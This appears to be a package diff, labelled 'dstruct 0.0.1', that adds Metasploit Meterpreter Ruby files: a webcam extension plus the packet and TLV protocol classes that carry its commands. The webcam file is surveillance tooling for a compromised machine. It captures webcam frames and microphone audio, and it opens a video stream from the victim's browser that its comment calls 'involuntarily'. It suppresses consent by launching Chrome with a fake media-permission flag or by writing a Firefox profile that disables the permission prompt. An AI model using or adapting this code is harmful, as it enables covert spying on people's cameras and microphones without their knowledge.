dstruct 0.0.1

data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb

@@ -0,0 +1,201 @@
+# -*- coding: binary -*-
+
+#require 'rex/post/meterpreter/extensions/process'
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Stdapi
+module Webcam
+
+###
+#
+# This meterpreter extension can list and capture from webcams and/or microphone
+#
+###
+class Webcam
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::WebRTC
+
+  def initialize(client)
+    @client = client
+  end
+
+  def session
+    @client
+  end
+
+  def webcam_list
+    response = client.send_request(Packet.create_request('webcam_list'))
+    names = []
+    response.get_tlvs( TLV_TYPE_WEBCAM_NAME ).each{ |tlv|
+      names << tlv.value
+    }
+    names
+  end
+
+  # Starts recording video from video source of index +cam+
+  def webcam_start(cam)
+    request = Packet.create_request('webcam_start')
+    request.add_tlv(TLV_TYPE_WEBCAM_INTERFACE_ID, cam)
+    client.send_request(request)
+    true
+  end
+
+  def webcam_get_frame(quality)
+    request = Packet.create_request('webcam_get_frame')
+    request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality)
+    response = client.send_request(request)
+    response.get_tlv( TLV_TYPE_WEBCAM_IMAGE ).value
+  end
+
+  def webcam_stop
+    client.send_request( Packet.create_request( 'webcam_stop' )  )
+    true
+  end
+
+  #
+  # Starts a webcam session with a remote user via WebRTC
+  #
+  # @param server [String] A server to use for the channel.
+  # @return void
+  #
+  def webcam_chat(server)
+    offerer_id = Rex::Text.rand_text_alphanumeric(10)
+    channel    = Rex::Text.rand_text_alphanumeric(20)
+
+    remote_browser_path = get_webrtc_browser_path
+
+    if remote_browser_path.blank?
+      raise RuntimeError, "Unable to find a suitable browser on the target machine"
+    end
+
+    ready_status = init_video_chat(remote_browser_path, server, channel, offerer_id)
+    connect_video_chat(server, channel, offerer_id)
+  end
+
+  # Record from default audio source for +duration+ seconds;
+  # returns a low-quality wav file
+  def record_mic(duration)
+    request = Packet.create_request('webcam_audio_record')
+    request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration)
+    response = client.send_request(request)
+    response.get_tlv( TLV_TYPE_AUDIO_DATA ).value
+  end
+
+  attr_accessor :client
+
+
+  private
+
+
+  #
+  # Returns a browser path that supports WebRTC
+  #
+  # @return [String]
+  #
+  def get_webrtc_browser_path
+    found_browser_path = ''
+
+    case client.platform
+    when /win/
+      paths = [
+        "Program Files\\Google\\Chrome\\Application\\chrome.exe",
+        "Program Files\\Mozilla Firefox\\firefox.exe"
+      ]
+
+      drive = session.sys.config.getenv("SYSTEMDRIVE")
+      paths = paths.map { |p| "#{drive}\\#{p}" }
+
+      # Old chrome path
+      user_profile = client.sys.config.getenv("USERPROFILE")
+      paths << "#{user_profile}\\Local Settings\\Application Data\\Google\\Chrome\\Application\\chrome.exe"
+
+      paths.each do |browser_path|
+        if file?(browser_path)
+          found_browser_path = browser_path
+          break
+        end
+      end
+
+    when /osx|bsd/
+      [
+        '/Applications/Google Chrome.app',
+        '/Applications/Firefox.app',
+      ].each do |browser_path|
+        if file?(browser_path)
+          found_browser_path = browser_path
+          break
+        end
+      end
+    when /linux|unix/
+      # Need to add support for Linux in the future.
+      # But you see, the Linux meterpreter is so broken there is no point
+      # to do it now. You can't test anyway.
+    end
+
+    found_browser_path
+  end
+
+
+  #
+  # Creates a video chat session as an offerer... involuntarily :-p
+  # Windows targets only.
+  #
+  # @param remote_browser_path [String] A browser path that supports WebRTC on the target machine
+  # @param offerer_id [String] A ID that the answerer can look for and join
+  #
+  def init_video_chat(remote_browser_path, server, channel, offerer_id)
+    interface = load_interface('offerer.html')
+    api       = load_api_code
+
+    interface = interface.gsub(/\=SERVER\=/, server)
+    interface = interface.gsub(/\=CHANNEL\=/, channel)
+    interface = interface.gsub(/\=OFFERERID\=/, offerer_id)
+
+    tmp_dir = session.sys.config.getenv("TEMP")
+
+    begin
+      write_file("#{tmp_dir}\\interface.html", interface)
+      write_file("#{tmp_dir}\\api.js", api)
+    rescue ::Exception => e
+      elog("webcam_chat failed. #{e.class} #{e.to_s}")
+      raise RuntimeError, "Unable to initialize the interface on the target machine"
+    end
+
+    #
+    # Automatically allow the webcam to run on the target machine
+    #
+    args = ''
+    if remote_browser_path =~ /Chrome/
+      args = "--allow-file-access-from-files --use-fake-ui-for-media-stream"
+    elsif remote_browser_path =~ /Firefox/
+      profile_name = Rex::Text.rand_text_alpha(8)
+      o = cmd_exec("#{remote_browser_path} --CreateProfile #{profile_name} #{tmp_dir}\\#{profile_name}")
+      profile_path = (o.scan(/created profile '.+' at '(.+)'/).flatten[0] || '').strip
+      setting = %Q|user_pref("media.navigator.permission.disabled", true);|
+      begin
+        write_file(profile_path, setting)
+      rescue ::Exception => e
+        elog("webcam_chat failed: #{e.class} #{e.to_s}")
+        raise RuntimeError, "Unable to write the necessary setting for Firefox."
+      end
+      args = "-p #{profile_name}"
+    end
+
+    exec_opts = {'Hidden' => false, 'Channelized' => false}
+
+    begin
+      session.sys.process.execute(remote_browser_path, "#{args} #{tmp_dir}\\interface.html", exec_opts)
+    rescue ::Exception => e
+      elog("webcam_chat failed. #{e.class} #{e.to_s}")
+      raise RuntimeError, "Unable to start the remote browser: #{e.message}"
+    end
+  end
+
+end
+
+end; end; end; end; end; end

data/lib/rex/post/meterpreter/inbound_packet_handler.rb

@@ -0,0 +1,30 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+
+###
+#
+# Mixin that provides stubs for handling inbound packets
+#
+###
+module InboundPacketHandler
+
+  #
+  # Stub request handler that returns false by default.
+  #
+  def request_handler(client, packet)
+    return false
+  end
+
+  #
+  # Stub response handler that returns false by default.
+  #
+  def response_handler(client, packet)
+    return false
+  end
+
+end
+
+end; end; end

data/lib/rex/post/meterpreter/object_aliases.rb

@@ -0,0 +1,83 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+
+###
+#
+# Mixin for classes that wish to have object aliases but do not
+# really need to inherit from the ObjectAliases class.
+#
+###
+module ObjectAliasesContainer
+
+  #
+  # Initialize the instance's aliases.
+  #
+  def initialize_aliases(aliases = {})
+    self.aliases = aliases
+  end
+
+  #
+  # Pass-thru aliases.
+  #
+  def method_missing(symbol, *args)
+    self.aliases[symbol.to_s]
+  end
+
+  #
+  # Recursively dumps all of the aliases registered with a class that
+  # is kind_of? ObjectAliases.
+  #
+  def dump_alias_tree(parent_path, current = nil)
+    items = []
+
+    if (current == nil)
+      current = self
+    end
+
+    # If the current object may have object aliases...
+    if (current.kind_of?(Rex::Post::Meterpreter::ObjectAliases))
+      current.aliases.each_key { |x|
+        current_path = parent_path + '.' + x
+
+        items << current_path
+
+        items.concat(dump_alias_tree(current_path,
+          current.aliases[x]))
+      }
+    end
+
+    return items
+  end
+
+  #
+  # The hash of aliases.
+  #
+  attr_accessor :aliases
+end
+
+###
+#
+# Generic object aliases from a class instance referenced symbol to an
+# associated object of an arbitrary type
+#
+###
+class ObjectAliases
+  include Rex::Post::Meterpreter::ObjectAliasesContainer
+
+  ##
+  #
+  # Constructor
+  #
+  ##
+
+  # An instance
+  def initialize(aliases = {})
+    initialize_aliases(aliases)
+  end
+end
+
+
+end; end; end

data/lib/rex/post/meterpreter/packet.rb

@@ -0,0 +1,709 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+
+#
+# Constants
+#
+PACKET_TYPE_REQUEST         = 0
+PACKET_TYPE_RESPONSE        = 1
+PACKET_TYPE_PLAIN_REQUEST   = 10
+PACKET_TYPE_PLAIN_RESPONSE  = 11
+
+#
+# TLV Meta Types
+#
+TLV_META_TYPE_NONE          = 0
+TLV_META_TYPE_STRING        = (1 << 16)
+TLV_META_TYPE_UINT          = (1 << 17)
+TLV_META_TYPE_RAW           = (1 << 18)
+TLV_META_TYPE_BOOL          = (1 << 19)
+TLV_META_TYPE_QWORD         = (1 << 20)
+TLV_META_TYPE_COMPRESSED    = (1 << 29)
+TLV_META_TYPE_GROUP         = (1 << 30)
+TLV_META_TYPE_COMPLEX       = (1 << 31)
+
+# Exclude compressed from the mask since other meta types (e.g. RAW) can also
+# be compressed
+TLV_META_MASK = (
+  TLV_META_TYPE_STRING |
+  TLV_META_TYPE_UINT |
+  TLV_META_TYPE_RAW |
+  TLV_META_TYPE_BOOL |
+  TLV_META_TYPE_QWORD |
+  TLV_META_TYPE_GROUP |
+  TLV_META_TYPE_COMPLEX
+)
+
+#
+# TLV base starting points
+#
+TLV_RESERVED                = 0
+TLV_EXTENSIONS              = 20000
+TLV_USER                    = 40000
+TLV_TEMP                    = 60000
+
+#
+# TLV Specific Types
+#
+TLV_TYPE_ANY                = TLV_META_TYPE_NONE   |   0
+TLV_TYPE_METHOD             = TLV_META_TYPE_STRING |   1
+TLV_TYPE_REQUEST_ID         = TLV_META_TYPE_STRING |   2
+TLV_TYPE_EXCEPTION          = TLV_META_TYPE_GROUP  |   3
+TLV_TYPE_RESULT             = TLV_META_TYPE_UINT   |   4
+
+
+TLV_TYPE_STRING             = TLV_META_TYPE_STRING |  10
+TLV_TYPE_UINT               = TLV_META_TYPE_UINT   |  11
+TLV_TYPE_BOOL               = TLV_META_TYPE_BOOL   |  12
+
+TLV_TYPE_LENGTH             = TLV_META_TYPE_UINT   |  25
+TLV_TYPE_DATA               = TLV_META_TYPE_RAW    |  26
+TLV_TYPE_FLAGS              = TLV_META_TYPE_UINT   |  27
+
+TLV_TYPE_CHANNEL_ID         = TLV_META_TYPE_UINT   |  50
+TLV_TYPE_CHANNEL_TYPE       = TLV_META_TYPE_STRING |  51
+TLV_TYPE_CHANNEL_DATA       = TLV_META_TYPE_RAW    |  52
+TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP  |  53
+TLV_TYPE_CHANNEL_CLASS      = TLV_META_TYPE_UINT   |  54
+TLV_TYPE_CHANNEL_PARENTID   = TLV_META_TYPE_UINT   |  55
+
+TLV_TYPE_SEEK_WHENCE        = TLV_META_TYPE_UINT   |  70
+TLV_TYPE_SEEK_OFFSET        = TLV_META_TYPE_UINT   |  71
+TLV_TYPE_SEEK_POS           = TLV_META_TYPE_UINT   |  72
+
+TLV_TYPE_EXCEPTION_CODE     = TLV_META_TYPE_UINT   | 300
+TLV_TYPE_EXCEPTION_STRING   = TLV_META_TYPE_STRING | 301
+
+TLV_TYPE_LIBRARY_PATH       = TLV_META_TYPE_STRING | 400
+TLV_TYPE_TARGET_PATH        = TLV_META_TYPE_STRING | 401
+TLV_TYPE_MIGRATE_PID        = TLV_META_TYPE_UINT   | 402
+TLV_TYPE_MIGRATE_LEN        = TLV_META_TYPE_UINT   | 403
+TLV_TYPE_MIGRATE_PAYLOAD    = TLV_META_TYPE_STRING | 404
+TLV_TYPE_MIGRATE_ARCH       = TLV_META_TYPE_UINT   | 405
+
+TLV_TYPE_CIPHER_NAME        = TLV_META_TYPE_STRING | 500
+TLV_TYPE_CIPHER_PARAMETERS  = TLV_META_TYPE_GROUP  | 501
+
+#
+# Core flags
+#
+LOAD_LIBRARY_FLAG_ON_DISK   = (1 << 0)
+LOAD_LIBRARY_FLAG_EXTENSION = (1 << 1)
+LOAD_LIBRARY_FLAG_LOCAL     = (1 << 2)
+
+###
+#
+# Base TLV (Type-Length-Value) class
+#
+###
+class Tlv
+  attr_accessor :type, :value, :compress
+
+  ##
+  #
+  # Constructor
+  #
+  ##
+
+  #
+  # Returns an instance of a TLV.
+  #
+  def initialize(type, value = nil, compress=false)
+    @type     = type
+    @compress = compress
+
+    if (value != nil)
+      if (type & TLV_META_TYPE_STRING == TLV_META_TYPE_STRING)
+        if (value.kind_of?(Fixnum))
+          @value = value.to_s
+        else
+          @value = value.dup
+        end
+      else
+        @value = value
+      end
+    end
+  end
+
+  def inspect
+    utype = type ^ TLV_META_TYPE_COMPRESSED
+    group = false
+    meta = case (utype & TLV_META_MASK)
+      when TLV_META_TYPE_STRING; "STRING"
+      when TLV_META_TYPE_UINT; "INT"
+      when TLV_META_TYPE_RAW; "RAW"
+      when TLV_META_TYPE_BOOL; "BOOL"
+      when TLV_META_TYPE_QWORD; "QWORD"
+      when TLV_META_TYPE_GROUP; group=true; "GROUP"
+      when TLV_META_TYPE_COMPLEX; "COMPLEX"
+      else; 'unknown-meta-type'
+      end
+    stype = case type
+      when PACKET_TYPE_REQUEST; "Request"
+      when PACKET_TYPE_RESPONSE; "Response"
+      when TLV_TYPE_REQUEST_ID; "REQUEST-ID"
+      when TLV_TYPE_METHOD; "METHOD"
+      when TLV_TYPE_RESULT; "RESULT"
+      when TLV_TYPE_EXCEPTION; "EXCEPTION"
+      when TLV_TYPE_STRING; "STRING"
+      when TLV_TYPE_UINT; "UINT"
+      when TLV_TYPE_BOOL; "BOOL"
+
+      when TLV_TYPE_LENGTH; "LENGTH"
+      when TLV_TYPE_DATA; "DATA"
+      when TLV_TYPE_FLAGS; "FLAGS"
+
+      when TLV_TYPE_CHANNEL_ID; "CHANNEL-ID"
+      when TLV_TYPE_CHANNEL_TYPE; "CHANNEL-TYPE"
+      when TLV_TYPE_CHANNEL_DATA; "CHANNEL-DATA"
+      when TLV_TYPE_CHANNEL_DATA_GROUP; "CHANNEL-DATA-GROUP"
+      when TLV_TYPE_CHANNEL_CLASS; "CHANNEL-CLASS"
+      when TLV_TYPE_CHANNEL_PARENTID; "CHANNEL-PARENTID"
+
+      when TLV_TYPE_SEEK_WHENCE; "SEEK-WHENCE"
+      when TLV_TYPE_SEEK_OFFSET; "SEEK-OFFSET"
+      when TLV_TYPE_SEEK_POS; "SEEK-POS"
+
+      when TLV_TYPE_EXCEPTION_CODE; "EXCEPTION-CODE"
+      when TLV_TYPE_EXCEPTION_STRING; "EXCEPTION-STRING"
+
+      when TLV_TYPE_LIBRARY_PATH; "LIBRARY-PATH"
+      when TLV_TYPE_TARGET_PATH; "TARGET-PATH"
+      when TLV_TYPE_MIGRATE_PID; "MIGRATE-PID"
+      when TLV_TYPE_MIGRATE_LEN; "MIGRATE-LEN"
+      when TLV_TYPE_MIGRATE_PAYLOAD; "MIGRATE-PAYLOAD"
+      when TLV_TYPE_MIGRATE_ARCH; "MIGRATE-ARCH"
+
+      #when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface'
+      #when Extensions::Stdapi::TLV_TYPE_IP; 'ip-address'
+      #when Extensions::Stdapi::TLV_TYPE_NETMASK; 'netmask'
+      #when Extensions::Stdapi::TLV_TYPE_MAC_ADDRESS; 'mac-address'
+      #when Extensions::Stdapi::TLV_TYPE_MAC_NAME; 'interface-name'
+      #when Extensions::Stdapi::TLV_TYPE_IP6_SCOPE; 'address-scope'
+      #when Extensions::Stdapi::TLV_TYPE_INTERFACE_MTU; 'interface-mtu'
+      #when Extensions::Stdapi::TLV_TYPE_INTERFACE_FLAGS; 'interface-flags'
+      #when Extensions::Stdapi::TLV_TYPE_INTERFACE_INDEX; 'interface-index'
+
+      else; "unknown-#{type}"
+      end
+    val = value.inspect
+    if val.length > 50
+      val = val[0,50] + ' ..."'
+    end
+    group ||= (self.class.to_s =~ /Packet/)
+    if group
+      tlvs_inspect = "tlvs=[\n"
+      @tlvs.each { |t|
+        tlvs_inspect << "  #{t.inspect}\n"
+      }
+      tlvs_inspect << "]"
+    else
+      tlvs_inspect = "meta=#{meta.ljust 10} value=#{val}"
+    end
+    "#<#{self.class} type=#{stype.ljust 15} #{tlvs_inspect}>"
+  end
+
+  ##
+  #
+  # Conditionals
+  #
+  ##
+
+  #
+  # Checks to see if a TLVs meta type is equivalent to the meta type passed.
+  #
+  def meta_type?(meta)
+    return (self.type & meta == meta)
+  end
+
+  #
+  # Checks to see if the TLVs type is equivalent to the type passed.
+  #
+  def type?(type)
+    return self.type == type
+  end
+
+  #
+  # Checks to see if the TLVs value is equivalent to the value passed.
+  #
+  def value?(value)
+    return self.value == value
+  end
+
+  ##
+  #
+  # Serializers
+  #
+  ##
+
+  #
+  # Converts the TLV to raw.
+  #
+  def to_r
+    # Forcibly convert to ASCII-8BIT encoding
+    raw = value.to_s.unpack("C*").pack("C*")
+
+    if (self.type & TLV_META_TYPE_STRING == TLV_META_TYPE_STRING)
+      raw += "\x00"
+    elsif (self.type & TLV_META_TYPE_UINT == TLV_META_TYPE_UINT)
+      raw = [value].pack("N")
+    elsif (self.type & TLV_META_TYPE_QWORD == TLV_META_TYPE_QWORD)
+      raw = [ self.htonq( value.to_i ) ].pack("Q<")
+    elsif (self.type & TLV_META_TYPE_BOOL == TLV_META_TYPE_BOOL)
+      if (value == true)
+        raw = [1].pack("c")
+      else
+        raw = [0].pack("c")
+      end
+    end
+
+    # check if the tlv is to be compressed...
+    if( @compress )
+      raw_uncompressed = raw
+      # compress the raw data
+      raw_compressed = Rex::Text.zlib_deflate( raw_uncompressed )
+      # check we have actually made the raw data smaller...
+      # (small blobs often compress slightly larger then the origional)
+      # if the compressed data is not smaller, we dont use the compressed data
+      if( raw_compressed.length < raw_uncompressed.length )
+        # if so, set the TLV's type to indicate compression is used
+        self.type = self.type | TLV_META_TYPE_COMPRESSED
+        # update the raw data with the uncompressed data length + compressed data
+        # (we include the uncompressed data length as the C side will need to know this for decompression)
+        raw = [ raw_uncompressed.length ].pack("N") + raw_compressed
+      end
+    end
+
+    return [raw.length + 8, self.type].pack("NN") + raw
+  end
+
+  #
+  # Translates the raw format of the TLV into a sanitize version.
+  #
+  def from_r(raw)
+    self.value  = nil
+
+    length, self.type = raw.unpack("NN");
+
+    # check if the tlv value has been compressed...
+    if( self.type & TLV_META_TYPE_COMPRESSED == TLV_META_TYPE_COMPRESSED )
+      # set this TLV as using compression
+      @compress = true
+      # remove the TLV_META_TYPE_COMPRESSED flag from the tlv type to restore the
+      # tlv type to its origional, allowing for transparent data compression.
+      self.type = self.type ^ TLV_META_TYPE_COMPRESSED
+      # decompress the compressed data (skipping the length and type DWORD's)
+      raw_decompressed = Rex::Text.zlib_inflate( raw[8..length-1] )
+      # update the length to reflect the decompressed data length (+8 for the length and type DWORD's)
+      length = raw_decompressed.length + 8
+      # update the raw buffer with the new length, decompressed data and updated type.
+      raw = [length, self.type].pack("NN") + raw_decompressed
+    end
+
+    if (self.type & TLV_META_TYPE_STRING == TLV_META_TYPE_STRING)
+      if (raw.length > 0)
+        self.value = raw[8..length-2]
+      else
+        self.value = nil
+      end
+    elsif (self.type & TLV_META_TYPE_UINT == TLV_META_TYPE_UINT)
+      self.value = raw.unpack("NNN")[2]
+    elsif (self.type & TLV_META_TYPE_QWORD == TLV_META_TYPE_QWORD)
+      self.value = raw.unpack("NNQ<")[2]
+      self.value = self.ntohq( self.value )
+    elsif (self.type & TLV_META_TYPE_BOOL == TLV_META_TYPE_BOOL)
+      self.value = raw.unpack("NNc")[2]
+
+      if (self.value == 1)
+        self.value = true
+      else
+        self.value = false
+      end
+    else
+      self.value = raw[8..length-1]
+    end
+
+    return length;
+  end
+
+  protected
+
+  def htonq( value )
+    if( [1].pack( 's' ) == [1].pack( 'n' ) )
+      return value
+    end
+    return [ value ].pack( 'Q<' ).reverse.unpack( 'Q<' ).first
+  end
+
+  def ntohq( value )
+    return htonq( value )
+  end
+
+end
+
+###
+#
+# Group TLVs contain zero or more TLVs
+#
+###
+class GroupTlv < Tlv
+  attr_accessor :tlvs
+
+  ##
+  #
+  # Constructor
+  #
+  ##
+
+  #
+  # Initializes the group TLV container to the supplied type
+  # and creates an empty TLV array.
+  #
+  def initialize(type)
+    super(type)
+
+    self.tlvs = [ ]
+  end
+
+  ##
+  #
+  # Group-based TLV accessors
+  #
+  ##
+
+  #
+  # Enumerates TLVs of the supplied type.
+  #
+  def each(type = TLV_TYPE_ANY, &block)
+    get_tlvs(type).each(&block)
+  end
+
+  #
+  # Synonym for each.
+  #
+  def each_tlv(type = TLV_TYPE_ANY, &block)
+    each(type, &block)
+  end
+
+  #
+  # Enumerates TLVs of a supplied type with indexes.
+  #
+  def each_with_index(type = TLV_TYPE_ANY, &block)
+    get_tlvs(type).each_with_index(&block)
+  end
+
+  #
+  # Synonym for each_with_index.
+  #
+  def each_tlv_with_index(type = TLV_TYPE_ANY, &block)
+    each_with_index(type, block)
+  end
+
+  #
+  # Returns an array of TLVs for the given type.
+  #
+  def get_tlvs(type)
+    if (type == TLV_TYPE_ANY)
+      return self.tlvs
+    else
+      type_tlvs = []
+
+      self.tlvs.each() { |tlv|
+        if (tlv.type?(type))
+          type_tlvs << tlv
+        end
+      }
+
+      return type_tlvs
+    end
+  end
+
+  ##
+  #
+  # TLV management
+  #
+  ##
+
+  #
+  # Adds a TLV of a given type and value.
+  #
+  def add_tlv(type, value = nil, replace = false, compress=false)
+
+    # If we should replace any TLVs with the same type...remove them first
+    if (replace)
+      each(type) { |tlv|
+        if (tlv.type == type)
+          self.tlvs.delete(tlv)
+        end
+      }
+    end
+
+    if (type & TLV_META_TYPE_GROUP == TLV_META_TYPE_GROUP)
+      tlv = GroupTlv.new(type)
+    else
+      tlv = Tlv.new(type, value, compress)
+    end
+
+    self.tlvs << tlv
+
+    return tlv
+  end
+
+  #
+  # Adds zero or more TLVs to the packet.
+  #
+  def add_tlvs(tlvs)
+    if (tlvs != nil)
+      tlvs.each { |tlv|
+        add_tlv(tlv['type'], tlv['value'])
+      }
+    end
+  end
+
+  #
+  # Gets the first TLV of a given type.
+  #
+  def get_tlv(type, index = 0)
+    type_tlvs = get_tlvs(type)
+
+    if (type_tlvs.length > index)
+      return type_tlvs[index]
+    end
+
+    return nil
+  end
+
+  #
+  # Returns the value of a TLV if it exists, otherwise nil.
+  #
+  def get_tlv_value(type, index = 0)
+    tlv = get_tlv(type, index)
+
+    return (tlv != nil) ? tlv.value : nil
+  end
+
+  #
+  # Returns an array of values for all tlvs of type type.
+  #
+  def get_tlv_values(type)
+    get_tlvs(type).collect { |a| a.value }
+  end
+
+  #
+  # Checks to see if the container has a TLV of a given type.
+  #
+  def has_tlv?(type)
+    return get_tlv(type) != nil
+  end
+
+  #
+  # Zeros out the array of TLVs.
+  #
+  def reset
+    self.tlvs = []
+  end
+
+  ##
+  #
+  # Serializers
+  #
+  ##
+
+  #
+  # Converts all of the TLVs in the TLV array to raw and prefixes them
+  # with a container TLV of this instance's TLV type.
+  #
+  def to_r
+    raw = ''
+
+    self.each() { |tlv|
+      raw << tlv.to_r
+    }
+
+    return [raw.length + 8, self.type].pack("NN") + raw
+  end
+
+  #
+  # Converts the TLV group container from raw to all of the individual
+  # TLVs.
+  #
+  def from_r(raw)
+    offset = 8
+
+    # Reset the TLVs array
+    self.tlvs = []
+    self.type = raw.unpack("NN")[1]
+
+    # Enumerate all of the TLVs
+    while (offset < raw.length-1)
+
+      tlv = nil
+
+      # Get the length and type
+      length, type = raw[offset..offset+8].unpack("NN")
+
+      if (type & TLV_META_TYPE_GROUP == TLV_META_TYPE_GROUP)
+        tlv = GroupTlv.new(type)
+      else
+        tlv = Tlv.new(type)
+      end
+
+      tlv.from_r(raw[offset..offset+length])
+
+      # Insert it into the list of TLVs
+      tlvs << tlv
+
+      # Move up
+      offset += length
+    end
+  end
+
+end
+
+###
+#
+# The logical meterpreter packet class
+#
+###
+class Packet < GroupTlv
+  attr_accessor :created_at
+
+  ##
+  #
+  # Factory
+  #
+  ##
+
+  #
+  # Creates a request with the supplied method.
+  #
+  def Packet.create_request(method = nil)
+    return Packet.new(PACKET_TYPE_REQUEST, method)
+  end
+
+  #
+  # Creates a response to a request if one is provided.
+  #
+  def Packet.create_response(request = nil)
+    response_type = PACKET_TYPE_RESPONSE
+    method = nil
+
+    if (request)
+      if (request.type?(PACKET_TYPE_PLAIN_REQUEST))
+        response_type = PACKET_TYPE_PLAIN_RESPONSE
+      end
+
+      method = request.method
+    end
+
+    return Packet.new(response_type, method)
+  end
+
+  ##
+  #
+  # Constructor
+  #
+  ##
+
+  #
+  # Initializes the packet to the supplied packet type and method,
+  # if any.  If the packet is a request, a request identifier is
+  # created.
+  #
+  def initialize(type = nil, method = nil)
+    super(type)
+
+    if (method)
+      self.method = method
+    end
+
+    self.created_at = ::Time.now
+
+    # If it's a request, generate a random request identifier
+    if ((type == PACKET_TYPE_REQUEST) ||
+        (type == PACKET_TYPE_PLAIN_REQUEST))
+      rid = ''
+
+      32.times { |val| rid << rand(10).to_s }
+
+      add_tlv(TLV_TYPE_REQUEST_ID, rid)
+    end
+  end
+
+  ##
+  #
+  # Conditionals
+  #
+  ##
+
+  #
+  # Checks to see if the packet is a response.
+  #
+  def response?
+    return ((self.type == PACKET_TYPE_RESPONSE) ||
+            (self.type == PACKET_TYPE_PLAIN_RESPONSE))
+  end
+
+  ##
+  #
+  # Accessors
+  #
+  ##
+
+  #
+  # Checks to see if the packet's method is equal to the supplied method.
+  #
+  def method?(method)
+    return (get_tlv_value(TLV_TYPE_METHOD) == method)
+  end
+
+  #
+  # Sets the packet's method TLV to the method supplied.
+  #
+  def method=(method)
+    add_tlv(TLV_TYPE_METHOD, method, true)
+  end
+
+  #
+  # Returns the value of the packet's method TLV.
+  #
+  def method
+    return get_tlv_value(TLV_TYPE_METHOD)
+  end
+
+  #
+  # Checks to see if the packet's result value is equal to the supplied
+  # result.
+  #
+  def result?(result)
+    return (get_tlv_value(TLV_TYPE_RESULT) == result)
+  end
+
+  #
+  # Sets the packet's result TLV.
+  #
+  def result=(result)
+    add_tlv(TLV_TYPE_RESULT, result, true)
+  end
+
+  #
+  # Gets the value of the packet's result TLV.
+  #
+  def result
+    return get_tlv_value(TLV_TYPE_RESULT)
+  end
+
+  #
+  # Gets the value of the packet's request identifier TLV.
+  #
+  def rid
+    return get_tlv_value(TLV_TYPE_REQUEST_ID)
+  end
+end
+
+
+end; end; end
+